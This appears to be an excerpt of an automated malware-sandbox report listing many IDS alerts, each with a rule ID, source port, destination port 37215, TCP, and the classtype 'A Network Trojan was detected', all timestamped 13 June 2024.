              SID:2835222
              Source Port:47914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870696
              SID:2829579
              Source Port:50904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.269801
              SID:2835222
              Source Port:51088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404393
              SID:2829579
              Source Port:40258
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.424305
              SID:2835222
              Source Port:38566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678918
              SID:2835222
              Source Port:56172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089806
              SID:2829579
              Source Port:42698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.727107
              SID:2829579
              Source Port:58942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.571043
              SID:2829579
              Source Port:49532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.154872
              SID:2835222
              Source Port:39178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.953922
              SID:2829579
              Source Port:50750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.553810
              SID:2829579
              Source Port:56824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.571748
              SID:2835222
              Source Port:38224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.073847
              SID:2829579
              Source Port:45630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087972
              SID:2829579
              Source Port:56580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485127
              SID:2835222
              Source Port:34150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350659
              SID:2835222
              Source Port:55172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.510133
              SID:2829579
              Source Port:56526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.403982
              SID:2835222
              Source Port:50312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.970547
              SID:2835222
              Source Port:33076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.099337
              SID:2835222
              Source Port:43736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888164
              SID:2835222
              Source Port:35504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.968166
              SID:2835222
              Source Port:57098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.952512
              SID:2835222
              Source Port:55272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.377861
              SID:2829579
              Source Port:54380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.676157
              SID:2829579
              Source Port:57752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.679449
              SID:2835222
              Source Port:40026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301843
              SID:2835222
              Source Port:59874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730276
              SID:2829579
              Source Port:34916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.995500
              SID:2829579
              Source Port:33374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407550
              SID:2829579
              Source Port:47746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.441016
              SID:2829579
              Source Port:56696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212184
              SID:2835222
              Source Port:57732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196471
              SID:2829579
              Source Port:47912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485595
              SID:2835222
              Source Port:45584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.751384
              SID:2835222
              Source Port:60178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.306735
              SID:2835222
              Source Port:55646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832513
              SID:2829579
              Source Port:36916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832376
              SID:2835222
              Source Port:35578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402652
              SID:2829579
              Source Port:46848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.076671
              SID:2829579
              Source Port:37866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832594
              SID:2829579
              Source Port:57786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.010550
              SID:2835222
              Source Port:41970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273017
              SID:2829579
              Source Port:35180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307489
              SID:2829579
              Source Port:55782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554961
              SID:2829579
              Source Port:35972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487674
              SID:2829579
              Source Port:56698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.418191
              SID:2835222
              Source Port:43548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.913172
              SID:2829579
              Source Port:53292
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027646
              SID:2829579
              Source Port:47382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131082
              SID:2829579
              Source Port:54468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.800977
              SID:2829579
              Source Port:35420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.549940
              SID:2835222
              Source Port:41902
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041961
              SID:2835222
              Source Port:39102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.477125
              SID:2829579
              Source Port:43712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.671582
              SID:2835222
              Source Port:60014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440232
              SID:2829579
              Source Port:33354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671295
              SID:2835222
              Source Port:54212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040683
              SID:2829579
              Source Port:46078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404513
              SID:2835222
              Source Port:38180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611273
              SID:2835222
              Source Port:48840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941698
              SID:2829579
              Source Port:48206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.199995
              SID:2835222
              Source Port:44660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.800818
              SID:2829579
              Source Port:47954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.831225
              SID:2835222
              Source Port:32938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.014635
              SID:2829579
              Source Port:33958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.450935
              SID:2835222
              Source Port:41052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373524
              SID:2835222
              Source Port:33342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013604
              SID:2835222
              Source Port:60968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.996197
              SID:2835222
              Source Port:48918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611471
              SID:2829579
              Source Port:36968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.265637
              SID:2829579
              Source Port:34820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.525694
              SID:2829579
              Source Port:34306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039034
              SID:2829579
              Source Port:36112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100614
              SID:2835222
              Source Port:49132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.245703
              SID:2835222
              Source Port:57952
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.270612
              SID:2829579
              Source Port:50874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658787
              SID:2835222
              Source Port:49934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.870106
              SID:2829579
              Source Port:32888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610701
              SID:2829579
              Source Port:37296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356406
              SID:2829579
              Source Port:49404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.237595
              SID:2829579
              Source Port:60744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730881
              SID:2829579
              Source Port:37282
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871428
              SID:2829579
              Source Port:34566
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.475642
              SID:2835222
              Source Port:56778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.178149
              SID:2829579
              Source Port:50838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754876
              SID:2829579
              Source Port:44352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278095
              SID:2829579
              Source Port:34324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835930
              SID:2835222
              Source Port:56000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048328
              SID:2829579
              Source Port:55890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.125732
              SID:2835222
              Source Port:40152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.174493
              SID:2835222
              Source Port:51376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.346255
              SID:2835222
              Source Port:43226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213075
              SID:2829579
              Source Port:52444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025779
              SID:2829579
              Source Port:56734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.133945
              SID:2829579
              Source Port:34340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157670
              SID:2829579
              Source Port:48696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.629981
              SID:2829579
              Source Port:35376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.228273
              SID:2829579
              Source Port:44148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485436
              SID:2829579
              Source Port:60990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408478
              SID:2829579
              Source Port:33632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.038893
              SID:2835222
              Source Port:47086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.631663
              SID:2835222
              Source Port:46848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100743
              SID:2835222
              Source Port:53730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.887731
              SID:2835222
              Source Port:53796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.475796
              SID:2829579
              Source Port:33544
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726034
              SID:2829579
              Source Port:32904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.213313
              SID:2829579
              Source Port:37310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.372257
              SID:2829579
              Source Port:44296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212913
              SID:2835222
              Source Port:47550
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.293769
              SID:2835222
              Source Port:56848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.272739
              SID:2829579
              Source Port:44364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075321
              SID:2835222
              Source Port:57348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.885878
              SID:2829579
              Source Port:39094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.504132
              SID:2829579
              Source Port:41784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710796
              SID:2829579
              Source Port:41102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253766
              SID:2835222
              Source Port:36176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.936560
              SID:2835222
              Source Port:59576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.097210
              SID:2829579
              Source Port:44188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.199872
              SID:2829579
              Source Port:53142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.991172
              SID:2829579
              Source Port:45102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.573420
              SID:2835222
              Source Port:60474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041481
              SID:2829579
              Source Port:33060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088141
              SID:2835222
              Source Port:43364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.154891
              SID:2829579
              Source Port:48168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.510064
              SID:2829579
              Source Port:37220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.935522
              SID:2835222
              Source Port:36310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503076
              SID:2829579
              Source Port:42528
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.258098
              SID:2835222
              Source Port:43060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316619
              SID:2835222
              Source Port:48930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.405100
              SID:2829579
              Source Port:53854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241061
              SID:2829579
              Source Port:59734
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.415835
              SID:2829579
              Source Port:49336
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100051
              SID:2835222
              Source Port:33656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.044391
              SID:2829579
              Source Port:47692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.113706
              SID:2835222
              Source Port:59850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.603749
              SID:2835222
              Source Port:50260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453069
              SID:2829579
              Source Port:35516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.135784
              SID:2835222
              Source Port:54070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.166332
              SID:2829579
              Source Port:50486
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659821
              SID:2835222
              Source Port:54830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656850
              SID:2829579
              Source Port:39482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.785264
              SID:2829579
              Source Port:50176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708852
              SID:2829579
              Source Port:57056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832636
              SID:2835222
              Source Port:36024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256748
              SID:2835222
              Source Port:42868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.127497
              SID:2829579
              Source Port:34686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833798
              SID:2829579
              Source Port:46122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.460156
              SID:2835222
              Source Port:54296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.655156
              SID:2829579
              Source Port:57396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042832
              SID:2835222
              Source Port:55426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.309889
              SID:2835222
              Source Port:52380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.231022
              SID:2835222
              Source Port:36170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300398
              SID:2835222
              Source Port:53654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.171418
              SID:2829579
              Source Port:37430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108457
              SID:2829579
              Source Port:34994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.306996
              SID:2829579
              Source Port:57794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357927
              SID:2835222
              Source Port:51632
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.607833
              SID:2835222
              Source Port:52646
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.096856
              SID:2829579
              Source Port:60896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317842
              SID:2835222
              Source Port:43070
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.011790
              SID:2829579
              Source Port:44092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016252
              SID:2835222
              Source Port:43004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.571798
              SID:2829579
              Source Port:46656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711380
              SID:2829579
              Source Port:39994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301397
              SID:2829579
              Source Port:47628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.109657
              SID:2829579
              Source Port:55728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610742
              SID:2835222
              Source Port:36602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028219
              SID:2829579
              Source Port:35624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942438
              SID:2829579
              Source Port:38302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.677821
              SID:2835222
              Source Port:45738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.100958
              SID:2829579
              Source Port:34570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.274810
              SID:2835222
              Source Port:34334
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.011059
              SID:2829579
              Source Port:41340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671665
              SID:2835222
              Source Port:32996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.785764
              SID:2835222
              Source Port:49750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.509629
              SID:2829579
              Source Port:37190
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213653
              SID:2835222
              Source Port:48706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785105
              SID:2829579
              Source Port:59256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.638708
              SID:2835222
              Source Port:55662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554537
              SID:2829579
              Source Port:47208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.633827
              SID:2829579
              Source Port:38344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.570290
              SID:2829579
              Source Port:39150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.783515
              SID:2835222
              Source Port:50654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174873
              SID:2829579
              Source Port:47024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.475837
              SID:2829579
              Source Port:38192
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.551143
              SID:2835222
              Source Port:35910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546147
              SID:2835222
              Source Port:44168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.262980
              SID:2835222
              Source Port:35260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.605818
              SID:2835222
              Source Port:48774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.153420
              SID:2835222
              Source Port:36870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.693995
              SID:2835222
              Source Port:54116
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307125
              SID:2829579
              Source Port:38394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.437684
              SID:2829579
              Source Port:56922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.573280
              SID:2829579
              Source Port:45962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.671041
              SID:2835222
              Source Port:42890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.012300
              SID:2835222
              Source Port:59956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.056864
              SID:2835222
              Source Port:35796
              Destination Port:37215
